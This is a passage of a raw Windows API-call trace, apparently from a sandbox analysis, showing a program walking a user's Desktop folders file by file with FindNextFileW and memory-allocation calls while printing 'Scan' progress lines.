ftLastAccessTime.dwLowDateTime=0x431e1b90, ftLastAccessTime.dwHighDateTime=0x1d5ded3, ftLastWriteTime.dwLowDateTime=0x431e1b90, ftLastWriteTime.dwHighDateTime=0x1d5ded3, nFileSizeHigh=0x0, nFileSizeLow=0x59e3, dwReserved0=0x77c7387a, dwReserved1=0x77f710e9, cFileName="Hjb-m4EYHMa7GTDEF.doc", cAlternateFileName="HJB-M4~1.DOC")) returned 1 [0057.987] malloc (_Size=0x2c) returned 0x1c80e38 [0057.987] free (_Block=0x1c80ae0) [0057.987] malloc (_Size=0x2c) returned 0x1c812f0 [0057.987] malloc (_Size=0xc) returned 0x27f400 [0057.987] malloc (_Size=0x2c) returned 0x1c81328 [0057.987] malloc (_Size=0x4) returned 0x1c80ae0 [0057.987] free (_Block=0x0) [0057.987] malloc (_Size=0x4) returned 0x1c80ab0 [0057.987] malloc (_Size=0xc) returned 0x27f6a0 [0057.987] malloc (_Size=0x2c) returned 0x1c81360 [0057.987] free (_Block=0x1c81360) [0057.987] free (_Block=0x27f6a0) [0057.987] free (_Block=0x1c80ab0) [0057.987] malloc (_Size=0x8) returned 0x1c80ab0 [0057.987] malloc (_Size=0x2c) returned 0x1c81360 [0057.987] free (_Block=0x1c80ab0) [0057.987] malloc (_Size=0x50) returned 0x1c81408 [0057.987] malloc (_Size=0x2c) returned 0x1c823d0 [0057.987] malloc (_Size=0x20) returned 0x1c82408 [0057.988] free (_Block=0x1c80280) [0057.988] free (_Block=0x0) [0057.988] free (_Block=0x0) [0057.988] free (_Block=0x1c81360) [0057.988] free (_Block=0x1c81328) [0057.988] free (_Block=0x27f400) [0057.988] free (_Block=0x1c80ae0) [0057.988] free (_Block=0x1c812f0) [0057.988] free (_Block=0x1c80e38) [0057.988] malloc (_Size=0x8) returned 0x1c80ae0 [0057.988] FindNextFileW (in: hFindFile=0x477b38, lpFindFileData=0x22ef08 | out: lpFindFileData=0x22ef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6da07d0, ftCreationTime.dwHighDateTime=0x1d5dd48, ftLastAccessTime.dwLowDateTime=0x8c1eec50, ftLastAccessTime.dwHighDateTime=0x1d5d9c1, ftLastWriteTime.dwLowDateTime=0x8c1eec50, ftLastWriteTime.dwHighDateTime=0x1d5d9c1, nFileSizeHigh=0x0, nFileSizeLow=0x1117c, dwReserved0=0x77c7387a, dwReserved1=0x77f710e9, cFileName="HMYVWNui_rNMPXSZ.bmp", cAlternateFileName="HMYVWN~1.BMP")) returned 1 [0057.988] malloc (_Size=0x2a) returned 0x1c80e38 [0057.988] free (_Block=0x1c80ae0) [0057.988] malloc (_Size=0x2a) returned 0x1c812f0 [0057.988] malloc (_Size=0xc) returned 0x27f400 [0057.988] malloc (_Size=0x2a) returned 0x1c81328 [0057.988] malloc (_Size=0x4) returned 0x1c80ae0 [0057.988] free (_Block=0x0) [0057.988] malloc (_Size=0x4) returned 0x1c80ab0 [0057.988] malloc (_Size=0xc) returned 0x27f6a0 [0057.988] malloc (_Size=0x2a) returned 0x1c81360 [0057.988] free (_Block=0x1c81360) [0057.988] free (_Block=0x27f6a0) [0057.988] free (_Block=0x1c80ab0) [0057.988] malloc (_Size=0x8) returned 0x1c80ab0 [0057.989] malloc (_Size=0x2a) returned 0x1c81360 [0057.989] free (_Block=0x1c80ab0) [0057.989] malloc (_Size=0x50) returned 0x1c81460 [0057.989] malloc (_Size=0x2a) returned 0x1c82430 [0057.989] free (_Block=0x0) [0057.989] free (_Block=0x0) [0057.989] free (_Block=0x1c81360) [0057.989] free (_Block=0x1c81328) [0057.989] free (_Block=0x27f400) [0057.989] free (_Block=0x1c80ae0) [0057.989] free (_Block=0x1c812f0) [0057.989] free (_Block=0x1c80e38) [0057.989] malloc (_Size=0x8) returned 0x1c80ae0 [0057.989] FindNextFileW (in: hFindFile=0x477b38, lpFindFileData=0x22ef08 | out: lpFindFileData=0x22ef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3638d50, ftCreationTime.dwHighDateTime=0x1d5def1, ftLastAccessTime.dwLowDateTime=0x4b1f8180, ftLastAccessTime.dwHighDateTime=0x1d5db45, ftLastWriteTime.dwLowDateTime=0x4b1f8180, ftLastWriteTime.dwHighDateTime=0x1d5db45, nFileSizeHigh=0x0, nFileSizeLow=0x16f23, dwReserved0=0x77c7387a, dwReserved1=0x77f710e9, cFileName="i0eSQ.mp3", cAlternateFileName="")) returned 1 [0057.989] malloc (_Size=0x14) returned 0x1c80280 [0057.989] free (_Block=0x1c80ae0) [0057.989] malloc (_Size=0x14) returned 0x1c800c0 [0057.989] malloc (_Size=0xc) returned 0x27f400 [0057.989] malloc (_Size=0x14) returned 0x1c801c0 [0057.989] malloc (_Size=0x4) returned 0x1c80ae0 [0057.989] free (_Block=0x0) [0057.989] malloc (_Size=0x4) returned 0x1c80ab0 [0057.989] malloc (_Size=0xc) returned 0x27f6a0 [0057.989] malloc (_Size=0x14) returned 0x1c80220 [0057.989] free (_Block=0x1c80220) [0057.989] free (_Block=0x27f6a0) [0057.990] free (_Block=0x1c80ab0) [0057.990] malloc (_Size=0x8) returned 0x1c80ab0 [0057.990] malloc (_Size=0x14) returned 0x1c80220 [0057.990] free (_Block=0x1c80ab0) [0057.990] malloc (_Size=0x50) returned 0x1c814b8 [0057.990] malloc (_Size=0x14) returned 0x1c80240 [0057.990] malloc (_Size=0x2c) returned 0x1c80e38 [0057.990] free (_Block=0x1c82408) [0057.990] free (_Block=0x0) [0057.990] free (_Block=0x0) [0057.990] free (_Block=0x1c80220) [0057.990] free (_Block=0x1c801c0) [0057.990] free (_Block=0x27f400) [0057.990] free (_Block=0x1c80ae0) [0057.990] free (_Block=0x1c800c0) [0057.990] free (_Block=0x1c80280) [0057.990] malloc (_Size=0x8) returned 0x1c80ae0 [0057.990] FindNextFileW (in: hFindFile=0x477b38, lpFindFileData=0x22ef08 | out: lpFindFileData=0x22ef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ba33410, ftCreationTime.dwHighDateTime=0x1d5e556, ftLastAccessTime.dwLowDateTime=0xab91b470, ftLastAccessTime.dwHighDateTime=0x1d5d933, ftLastWriteTime.dwLowDateTime=0xab91b470, ftLastWriteTime.dwHighDateTime=0x1d5d933, nFileSizeHigh=0x0, nFileSizeLow=0x166aa, dwReserved0=0x1c812f0, dwReserved1=0x270150, cFileName="isH8zy.flv", cAlternateFileName="")) returned 1 [0057.990] malloc (_Size=0x16) returned 0x1c80280 [0057.990] free (_Block=0x1c80ae0) [0057.990] malloc (_Size=0x16) returned 0x1c800c0 [0057.990] malloc (_Size=0xc) returned 0x27f400 [0057.990] malloc (_Size=0x16) returned 0x1c801c0 [0057.990] malloc (_Size=0x4) returned 0x1c80ae0 [0057.990] free (_Block=0x0) [0057.990] malloc (_Size=0x4) returned 0x1c80ab0 [0057.991] malloc (_Size=0xc) returned 0x27f6a0 [0057.991] malloc (_Size=0x16) returned 0x1c80220 [0057.991] free (_Block=0x1c80220) [0057.991] free (_Block=0x27f6a0) [0057.991] free (_Block=0x1c80ab0) [0057.991] malloc (_Size=0x8) returned 0x1c80ab0 [0057.991] malloc (_Size=0x16) returned 0x1c80220 [0057.991] free (_Block=0x1c80ab0) [0057.991] malloc (_Size=0x50) returned 0x1c81510 [0057.991] malloc (_Size=0x16) returned 0x1c802e0 [0057.991] free (_Block=0x0) [0057.991] free (_Block=0x0) [0057.991] free (_Block=0x1c80220) [0057.991] free (_Block=0x1c801c0) [0057.991] free (_Block=0x27f400) [0057.991] free (_Block=0x1c80ae0) [0057.991] free (_Block=0x1c800c0) [0057.991] free (_Block=0x1c80280) [0057.991] malloc (_Size=0x8) returned 0x1c80ae0 [0057.991] FindNextFileW (in: hFindFile=0x477b38, lpFindFileData=0x22ef08 | out: lpFindFileData=0x22ef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeef77100, ftCreationTime.dwHighDateTime=0x1d5e4cd, ftLastAccessTime.dwLowDateTime=0x178a4ba0, ftLastAccessTime.dwHighDateTime=0x1d5df98, ftLastWriteTime.dwLowDateTime=0x178a4ba0, ftLastWriteTime.dwHighDateTime=0x1d5df98, nFileSizeHigh=0x0, nFileSizeLow=0x9358, dwReserved0=0x1c812f0, dwReserved1=0x270150, cFileName="KaGXpX_uv.docx", cAlternateFileName="KAGXPX~1.DOC")) returned 1 [0057.991] malloc (_Size=0x1e) returned 0x1c82408 [0057.991] free (_Block=0x1c80ae0) [0057.991] malloc (_Size=0x1e) returned 0x1c812f0 [0057.992] malloc (_Size=0xc) returned 0x27f400 [0057.992] malloc (_Size=0x1e) returned 0x1c81318 [0057.992] malloc (_Size=0x4) returned 0x1c80ae0 [0057.992] free (_Block=0x0) [0057.992] malloc (_Size=0x4) returned 0x1c80ab0 [0057.992] malloc (_Size=0xc) returned 0x27f6a0 [0057.992] malloc (_Size=0x1e) returned 0x1c81340 [0057.992] free (_Block=0x1c81340) [0057.992] free (_Block=0x27f6a0) [0057.992] free (_Block=0x1c80ab0) [0057.992] malloc (_Size=0x8) returned 0x1c80ab0 [0057.992] malloc (_Size=0x1e) returned 0x1c81340 [0057.992] free (_Block=0x1c80ab0) [0057.992] malloc (_Size=0x50) returned 0x1c81568 [0057.992] malloc (_Size=0x1e) returned 0x1c81368 [0057.992] free (_Block=0x0) [0057.992] free (_Block=0x0) [0057.992] free (_Block=0x1c81340) [0057.992] free (_Block=0x1c81318) [0057.992] free (_Block=0x27f400) [0057.992] free (_Block=0x1c80ae0) [0057.992] free (_Block=0x1c812f0) [0057.992] free (_Block=0x1c82408) [0057.992] malloc (_Size=0x8) returned 0x1c80ae0 [0057.993] FindNextFileW (in: hFindFile=0x477b38, lpFindFileData=0x22ef08 | out: lpFindFileData=0x22ef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd77cec0, ftCreationTime.dwHighDateTime=0x1d5e67b, ftLastAccessTime.dwLowDateTime=0x6ea3b250, ftLastAccessTime.dwHighDateTime=0x1d5d93a, ftLastWriteTime.dwLowDateTime=0x6ea3b250, ftLastWriteTime.dwHighDateTime=0x1d5d93a, nFileSizeHigh=0x0, nFileSizeLow=0xf312, dwReserved0=0x77c7387a, dwReserved1=0x77f710e9, cFileName="KGvZ520tJ.ods", cAlternateFileName="KGVZ52~1.ODS")) returned 1 [0057.993] malloc (_Size=0x1c) returned 0x1c82408 [0057.993] free (_Block=0x1c80ae0) [0057.993] malloc (_Size=0x1c) returned 0x1c812f0 [0057.993] malloc (_Size=0xc) returned 0x27f400 [0057.993] malloc (_Size=0x1c) returned 0x1c81318 [0057.993] malloc (_Size=0x4) returned 0x1c80ae0 [0057.993] free (_Block=0x0) [0057.993] malloc (_Size=0x4) returned 0x1c80ab0 [0057.993] malloc (_Size=0xc) returned 0x27f6a0 [0057.993] malloc (_Size=0x1c) returned 0x1c81340 [0057.993] free (_Block=0x1c81340) [0057.993] free (_Block=0x27f6a0) [0057.993] free (_Block=0x1c80ab0) [0057.993] malloc (_Size=0x8) returned 0x1c80ab0 [0057.993] malloc (_Size=0x1c) returned 0x1c81340 [0057.993] free (_Block=0x1c80ab0) [0057.993] malloc (_Size=0x50) returned 0x1c815c0 [0057.993] malloc (_Size=0x1c) returned 0x1c82468 [0057.993] malloc (_Size=0x38) returned 0x1c82490 [0057.993] free (_Block=0x1c80e38) [0057.993] free (_Block=0x0) [0057.993] free (_Block=0x0) [0057.994] free (_Block=0x1c81340) [0057.994] free (_Block=0x1c81318) [0057.994] free (_Block=0x27f400) [0057.994] free (_Block=0x1c80ae0) [0057.994] free (_Block=0x1c812f0) [0057.994] free (_Block=0x1c82408) [0057.994] malloc (_Size=0x8) returned 0x1c80ae0 [0057.994] FindNextFileW (in: hFindFile=0x477b38, lpFindFileData=0x22ef08 | out: lpFindFileData=0x22ef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41820a0, ftCreationTime.dwHighDateTime=0x1d5e395, ftLastAccessTime.dwLowDateTime=0xe221dc0, ftLastAccessTime.dwHighDateTime=0x1d5d9e6, ftLastWriteTime.dwLowDateTime=0xe221dc0, ftLastWriteTime.dwHighDateTime=0x1d5d9e6, nFileSizeHigh=0x0, nFileSizeLow=0x138c7, dwReserved0=0x77c7387a, dwReserved1=0x77f710e9, cFileName="mcjVmrm7V7AJ6t.odt", cAlternateFileName="MCJVMR~1.ODT")) returned 1 [0057.994] malloc (_Size=0x26) returned 0x1c80e38 [0057.994] free (_Block=0x1c80ae0) [0057.994] malloc (_Size=0x26) returned 0x1c812f0 [0057.994] malloc (_Size=0xc) returned 0x27f400 [0057.994] malloc (_Size=0x26) returned 0x1c81320 [0057.994] malloc (_Size=0x4) returned 0x1c80ae0 [0057.994] free (_Block=0x0) [0057.994] malloc (_Size=0x4) returned 0x1c80ab0 [0057.994] malloc (_Size=0xc) returned 0x27f6a0 [0057.994] malloc (_Size=0x26) returned 0x1c824d0 [0057.994] free (_Block=0x1c824d0) [0057.994] free (_Block=0x27f6a0) [0057.994] free (_Block=0x1c80ab0) [0057.994] malloc (_Size=0x8) returned 0x1c80ab0 [0057.994] malloc (_Size=0x26) returned 0x1c824d0 [0057.994] free (_Block=0x1c80ab0) [0057.995] malloc (_Size=0x50) returned 0x1c81618 [0057.995] malloc (_Size=0x26) returned 0x1c82500 [0057.995] free (_Block=0x0) [0057.995] free (_Block=0x0) [0057.995] free (_Block=0x1c824d0) [0057.995] free (_Block=0x1c81320) [0057.995] free (_Block=0x27f400) [0057.995] free (_Block=0x1c80ae0) [0057.995] free (_Block=0x1c812f0) [0057.995] free (_Block=0x1c80e38) [0057.995] malloc (_Size=0x8) returned 0x1c80ae0 [0057.995] FindNextFileW (in: hFindFile=0x477b38, lpFindFileData=0x22ef08 | out: lpFindFileData=0x22ef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc0d4740, ftCreationTime.dwHighDateTime=0x1d5e3d3, ftLastAccessTime.dwLowDateTime=0xa4f50400, ftLastAccessTime.dwHighDateTime=0x1d5e4d7, ftLastWriteTime.dwLowDateTime=0xa4f50400, ftLastWriteTime.dwHighDateTime=0x1d5e4d7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c7387a, dwReserved1=0x77f710e9, cFileName="mfZck7HwXf4SziBj", cAlternateFileName="MFZCK7~1")) returned 1 [0057.995] malloc (_Size=0x22) returned 0x1c824d0 [0057.995] free (_Block=0x1c80ae0) [0057.995] malloc (_Size=0x22) returned 0x1c80e38 [0057.995] malloc (_Size=0xc) returned 0x27f400 [0057.995] malloc (_Size=0x22) returned 0x1c812f0 [0057.995] malloc (_Size=0x4) returned 0x1c80ae0 [0057.996] free (_Block=0x0) [0057.996] malloc (_Size=0x4) returned 0x1c80ab0 [0057.996] malloc (_Size=0xc) returned 0x27f6a0 [0057.996] malloc (_Size=0x22) returned 0x1c81320 [0057.996] free (_Block=0x1c81320) [0057.996] free (_Block=0x27f6a0) [0057.996] free (_Block=0x1c80ab0) [0057.996] malloc (_Size=0x8) returned 0x1c80ab0 [0057.996] malloc (_Size=0x22) returned 0x1c81320 [0057.996] free (_Block=0x1c80ab0) [0057.996] malloc (_Size=0x50) returned 0x1c81670 [0057.996] malloc (_Size=0x22) returned 0x1c82530 [0057.996] free (_Block=0x0) [0057.996] free (_Block=0x0) [0057.996] free (_Block=0x1c81320) [0057.996] free (_Block=0x1c812f0) [0057.996] free (_Block=0x27f400) [0057.996] malloc (_Size=0xc) returned 0x27f400 [0057.996] malloc (_Size=0x22) returned 0x1c812f0 [0057.996] malloc (_Size=0x24) returned 0x1c81320 [0057.996] malloc (_Size=0x8) returned 0x1c80ab0 [0057.996] free (_Block=0x1c80a70) [0057.996] malloc (_Size=0x8) returned 0x1c80a70 [0057.997] free (_Block=0x1c80be0) [0057.997] malloc (_Size=0xc) returned 0x27f6a0 [0057.997] malloc (_Size=0x24) returned 0x1c82560 [0057.997] malloc (_Size=0x8) returned 0x1c80be0 [0057.997] free (_Block=0x1c80bf0) [0057.997] malloc (_Size=0x70) returned 0x1c82590 [0057.997] malloc (_Size=0x70) returned 0x1c82608 [0057.997] free (_Block=0x1c80de0) [0057.997] GetTickCount () returned 0x1146ab5 [0057.997] malloc (_Size=0x8) returned 0x1c80bf0 [0057.997] malloc (_Size=0x70) returned 0x1c82680 [0057.997] free (_Block=0x1c80bf0) [0057.997] malloc (_Size=0xc0) returned 0x1c826f8 [0057.997] free (_Block=0x1c82680) [0057.997] malloc (_Size=0x8) returned 0x1c80bf0 [0057.997] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mfZck7HwXf4SziBj\\*", lpFindFileData=0x22ed2c | out: lpFindFileData=0x22ed2c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc0d4740, ftCreationTime.dwHighDateTime=0x1d5e3d3, ftLastAccessTime.dwLowDateTime=0xa4f50400, ftLastAccessTime.dwHighDateTime=0x1d5e4d7, ftLastWriteTime.dwLowDateTime=0xa4f50400, ftLastWriteTime.dwHighDateTime=0x1d5e4d7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c73ca3, dwReserved1=0x77f70edd, cFileName=".", cAlternateFileName="")) returned 0x477b78 [0057.997] FindNextFileW (in: hFindFile=0x477b78, lpFindFileData=0x22ed48 | out: lpFindFileData=0x22ed48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc0d4740, ftCreationTime.dwHighDateTime=0x1d5e3d3, ftLastAccessTime.dwLowDateTime=0xa4f50400, ftLastAccessTime.dwHighDateTime=0x1d5e4d7, ftLastWriteTime.dwLowDateTime=0xa4f50400, ftLastWriteTime.dwHighDateTime=0x1d5e4d7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x270150, dwReserved1=0x270150, cFileName="..", cAlternateFileName="")) returned 1 [0057.998] FindNextFileW (in: hFindFile=0x477b78, lpFindFileData=0x22ed48 | out: lpFindFileData=0x22ed48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xddceac80, ftCreationTime.dwHighDateTime=0x1d5ded4, ftLastAccessTime.dwLowDateTime=0x17d15b70, ftLastAccessTime.dwHighDateTime=0x1d5dc92, ftLastWriteTime.dwLowDateTime=0x17d15b70, ftLastWriteTime.dwHighDateTime=0x1d5dc92, nFileSizeHigh=0x0, nFileSizeLow=0x76e9, dwReserved0=0x270150, dwReserved1=0x270150, cFileName="C3I6eOjcg.flv", cAlternateFileName="C3I6EO~1.FLV")) returned 1 [0057.998] malloc (_Size=0x1c) returned 0x1c82408 [0057.998] free (_Block=0x1c80bf0) [0057.998] malloc (_Size=0x1c) returned 0x1c80de0 [0057.998] malloc (_Size=0x4) returned 0x1c80bf0 [0057.998] malloc (_Size=0xc) returned 0x27f688 [0057.998] malloc (_Size=0x22) returned 0x1c80e08 [0057.998] malloc (_Size=0xc) returned 0x27f658 [0057.998] malloc (_Size=0x1c) returned 0x1c82680 [0057.998] malloc (_Size=0x8) returned 0x1c80ad0 [0057.998] free (_Block=0x1c80bf0) [0057.998] malloc (_Size=0x8) returned 0x1c80bf0 [0057.998] malloc (_Size=0xc) returned 0x27f418 [0057.998] malloc (_Size=0x22) returned 0x1c826a8 [0057.998] malloc (_Size=0xc) returned 0x27f4d8 [0057.998] malloc (_Size=0x1c) returned 0x1c827c0 [0057.998] free (_Block=0x1c827c0) [0057.998] free (_Block=0x27f4d8) [0057.999] free (_Block=0x1c826a8) [0057.999] free (_Block=0x27f418) [0057.999] free (_Block=0x1c80bf0) [0057.999] malloc (_Size=0x8) returned 0x1c80bf0 [0057.999] malloc (_Size=0x1c) returned 0x1c826a8 [0057.999] free (_Block=0x1c80bf0) [0057.999] malloc (_Size=0x50) returned 0x1c816c8 [0057.999] malloc (_Size=0x1c) returned 0x1c826d0 [0057.999] malloc (_Size=0x48) returned 0x1c827c0 [0057.999] free (_Block=0x1c82490) [0057.999] free (_Block=0x0) [0057.999] free (_Block=0x0) [0057.999] free (_Block=0x1c826a8) [0057.999] free (_Block=0x1c82680) [0057.999] free (_Block=0x27f658) [0057.999] free (_Block=0x1c80e08) [0057.999] free (_Block=0x27f688) [0057.999] free (_Block=0x1c80ad0) [0057.999] free (_Block=0x1c80de0) [0057.999] free (_Block=0x1c82408) [0057.999] malloc (_Size=0x8) returned 0x1c80ad0 [0057.999] FindNextFileW (in: hFindFile=0x477b78, lpFindFileData=0x22ed48 | out: lpFindFileData=0x22ed48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbadaa9d0, ftCreationTime.dwHighDateTime=0x1d5ddd6, ftLastAccessTime.dwLowDateTime=0x47c0e570, ftLastAccessTime.dwHighDateTime=0x1d5dafe, ftLastWriteTime.dwLowDateTime=0x47c0e570, ftLastWriteTime.dwHighDateTime=0x1d5dafe, nFileSizeHigh=0x0, nFileSizeLow=0xd639, dwReserved0=0x77c7387a, dwReserved1=0x77f70ea9, cFileName="hq8xL2.png", cAlternateFileName="")) returned 1 [0057.999] malloc (_Size=0x16) returned 0x1c80280 [0057.999] free (_Block=0x1c80ad0) [0057.999] malloc (_Size=0x16) returned 0x1c800c0 [0058.000] malloc (_Size=0x4) returned 0x1c80ad0 [0058.000] malloc (_Size=0xc) returned 0x27f688 [0058.000] malloc (_Size=0x22) returned 0x1c82490 [0058.000] malloc (_Size=0xc) returned 0x27f658 [0058.000] malloc (_Size=0x16) returned 0x1c801c0 [0058.000] FindNextFileW (in: hFindFile=0x477b78, lpFindFileData=0x22ed48 | out: lpFindFileData=0x22ed48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafa7d970, ftCreationTime.dwHighDateTime=0x1d5d7f5, ftLastAccessTime.dwLowDateTime=0xd5272290, ftLastAccessTime.dwHighDateTime=0x1d5e151, ftLastWriteTime.dwLowDateTime=0xd5272290, ftLastWriteTime.dwHighDateTime=0x1d5e151, nFileSizeHigh=0x0, nFileSizeLow=0x160f8, dwReserved0=0x22ee58, dwReserved1=0x6, cFileName="q6TXhUAdi.bmp", cAlternateFileName="Q6TXHU~1.BMP")) returned 1 [0058.000] FindNextFileW (in: hFindFile=0x477b78, lpFindFileData=0x22ed48 | out: lpFindFileData=0x22ed48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6dfdf3f0, ftCreationTime.dwHighDateTime=0x1d5dfb2, ftLastAccessTime.dwLowDateTime=0xe05e6a10, ftLastAccessTime.dwHighDateTime=0x1d5db9d, ftLastWriteTime.dwLowDateTime=0xe05e6a10, ftLastWriteTime.dwHighDateTime=0x1d5db9d, nFileSizeHigh=0x0, nFileSizeLow=0x16cb, dwReserved0=0x77c7387a, dwReserved1=0x77f70ea9, cFileName="z8HWZufZB7.jpg", cAlternateFileName="Z8HWZU~1.JPG")) returned 1 [0058.000] FindNextFileW (in: hFindFile=0x477b78, lpFindFileData=0x22ed48 | out: lpFindFileData=0x22ed48*(dwFileAttributes=0x270000, ftCreationTime.dwLowDateTime=0x270150, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x270000, ftLastAccessTime.dwHighDateTime=0x40, ftLastWriteTime.dwLowDateTime=0x1c80e00, ftLastWriteTime.dwHighDateTime=0x22ee50, nFileSizeHigh=0x77c7389e, nFileSizeLow=0x270138, dwReserved0=0x77c7387a, dwReserved1=0x77f70ea9, cFileName="", cAlternateFileName="")) returned 0 [0058.000] GetLastError () returned 0x12 [0058.000] free (_Block=0x1c80bf0) [0058.000] free (_Block=0x1c826f8) [0058.000] FindClose (in: hFindFile=0x477b78 | out: hFindFile=0x477b78) returned 1 [0058.000] free (_Block=0x1c82590) [0058.000] free (_Block=0x1c81320) [0058.000] free (_Block=0x1c812f0) [0058.000] free (_Block=0x27f400) [0058.000] free (_Block=0x1c80ae0) [0058.000] FindNextFileW (in: hFindFile=0x477b38, lpFindFileData=0x22ef08 | out: lpFindFileData=0x22ef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7a308330, ftCreationTime.dwHighDateTime=0x1d5d7c0, ftLastAccessTime.dwLowDateTime=0x24457460, ftLastAccessTime.dwHighDateTime=0x1d5d7bd, ftLastWriteTime.dwLowDateTime=0x24457460, ftLastWriteTime.dwHighDateTime=0x1d5d7bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x270000, dwReserved1=0x1c81318, cFileName="moG2C7rzW", cAlternateFileName="MOG2C7~1")) returned 1 [0058.001] strcmp (_Str1="Scan ", _Str2="Scan ") returned 0 [0058.001] strlen (_Str="0") returned 0x1 [0058.001] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0058.071] fputs (in: _Str=" 0M 19 Scan C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\", _File=0x77032920 | out: _File=0x77032920) returned 0 [0058.072] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0058.072] malloc (_Size=0x3f) returned 0x1c82680 [0058.072] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\*", lpFindFileData=0x22ed2c | out: lpFindFileData=0x22ed2c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7a308330, ftCreationTime.dwHighDateTime=0x1d5d7c0, ftLastAccessTime.dwLowDateTime=0x24457460, ftLastAccessTime.dwHighDateTime=0x1d5d7bd, ftLastWriteTime.dwLowDateTime=0x24457460, ftLastWriteTime.dwHighDateTime=0x1d5d7bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x270000, cFileName=".", cAlternateFileName="")) returned 0x477b78 [0058.072] FindNextFileW (in: hFindFile=0x477b78, lpFindFileData=0x22ed48 | out: lpFindFileData=0x22ed48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7a308330, ftCreationTime.dwHighDateTime=0x1d5d7c0, ftLastAccessTime.dwLowDateTime=0x24457460, ftLastAccessTime.dwHighDateTime=0x1d5d7bd, ftLastWriteTime.dwLowDateTime=0x24457460, ftLastWriteTime.dwHighDateTime=0x1d5d7bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1c80f50, dwReserved1=0xe, cFileName="..", cAlternateFileName="")) returned 1 [0058.073] FindNextFileW (in: hFindFile=0x477b78, lpFindFileData=0x22ed48 | out: lpFindFileData=0x22ed48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7bf2350, ftCreationTime.dwHighDateTime=0x1d5d8aa, ftLastAccessTime.dwLowDateTime=0xe5d35a10, ftLastAccessTime.dwHighDateTime=0x1d5e2d6, ftLastWriteTime.dwLowDateTime=0xe5d35a10, ftLastWriteTime.dwHighDateTime=0x1d5e2d6, nFileSizeHigh=0x0, nFileSizeLow=0xcacd, dwReserved0=0x1c80f50, dwReserved1=0xe, cFileName="1VyHqT6C0o53edILQ.xls", cAlternateFileName="1VYHQT~1.XLS")) returned 1 [0058.073] malloc (_Size=0x2c) returned 0x1c827a0 [0058.073] free (_Block=0x1c80be0) [0058.073] malloc (_Size=0x2c) returned 0x1c827d8 [0058.073] malloc (_Size=0x4) returned 0x1c80be0 [0058.073] malloc (_Size=0xc) returned 0x27f568 [0058.073] malloc (_Size=0x14) returned 0x1c80360 [0058.073] malloc (_Size=0xc) returned 0x27f580 [0058.073] malloc (_Size=0x2c) returned 0x1c80fb0 [0058.073] malloc (_Size=0x8) returned 0x1c80a70 [0058.073] free (_Block=0x1c80be0) [0058.073] malloc (_Size=0x8) returned 0x1c80be0 [0058.074] malloc (_Size=0xc) returned 0x27f598 [0058.074] malloc (_Size=0x14) returned 0x1c80380 [0058.074] malloc (_Size=0xc) returned 0x27f5b0 [0058.074] malloc (_Size=0x2c) returned 0x1c80fe8 [0058.074] free (_Block=0x1c80fe8) [0058.074] free (_Block=0x27f5b0) [0058.074] free (_Block=0x1c80380) [0058.074] free (_Block=0x27f598) [0058.074] free (_Block=0x1c80be0) [0058.074] malloc (_Size=0x8) returned 0x1c80be0 [0058.074] malloc (_Size=0x2c) returned 0x1c80fe8 [0058.074] free (_Block=0x1c80be0) [0058.074] malloc (_Size=0x50) returned 0x1c81880 [0058.074] malloc (_Size=0x2c) returned 0x1c82860 [0058.074] free (_Block=0x0) [0058.074] free (_Block=0x0) [0058.074] free (_Block=0x1c80fe8) [0058.074] free (_Block=0x1c80fb0) [0058.074] free (_Block=0x27f580) [0058.074] free (_Block=0x1c80360) [0058.074] free (_Block=0x27f568) [0058.074] free (_Block=0x1c80a70) [0058.075] free (_Block=0x1c827d8) [0058.075] free (_Block=0x1c827a0) [0058.075] malloc (_Size=0x8) returned 0x1c80a70 [0058.075] FindNextFileW (in: hFindFile=0x477b78, lpFindFileData=0x22ed48 | out: lpFindFileData=0x22ed48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0e9bba0, ftCreationTime.dwHighDateTime=0x1d5dee8, ftLastAccessTime.dwLowDateTime=0x7737fd00, ftLastAccessTime.dwHighDateTime=0x1d5e2df, ftLastWriteTime.dwLowDateTime=0x7737fd00, ftLastWriteTime.dwHighDateTime=0x1d5e2df, nFileSizeHigh=0x0, nFileSizeLow=0x4021, dwReserved0=0x77c7387a, dwReserved1=0x77f70ea9, cFileName="KYMLAaYO.ots", cAlternateFileName="")) returned 1 [0058.075] malloc (_Size=0x1a) returned 0x1c82408 [0058.075] free (_Block=0x1c80a70) [0058.075] malloc (_Size=0x1a) returned 0x272c10 [0058.075] malloc (_Size=0x4) returned 0x1c80a70 [0058.075] malloc (_Size=0xc) returned 0x27f568 [0058.075] malloc (_Size=0x14) returned 0x1c80360 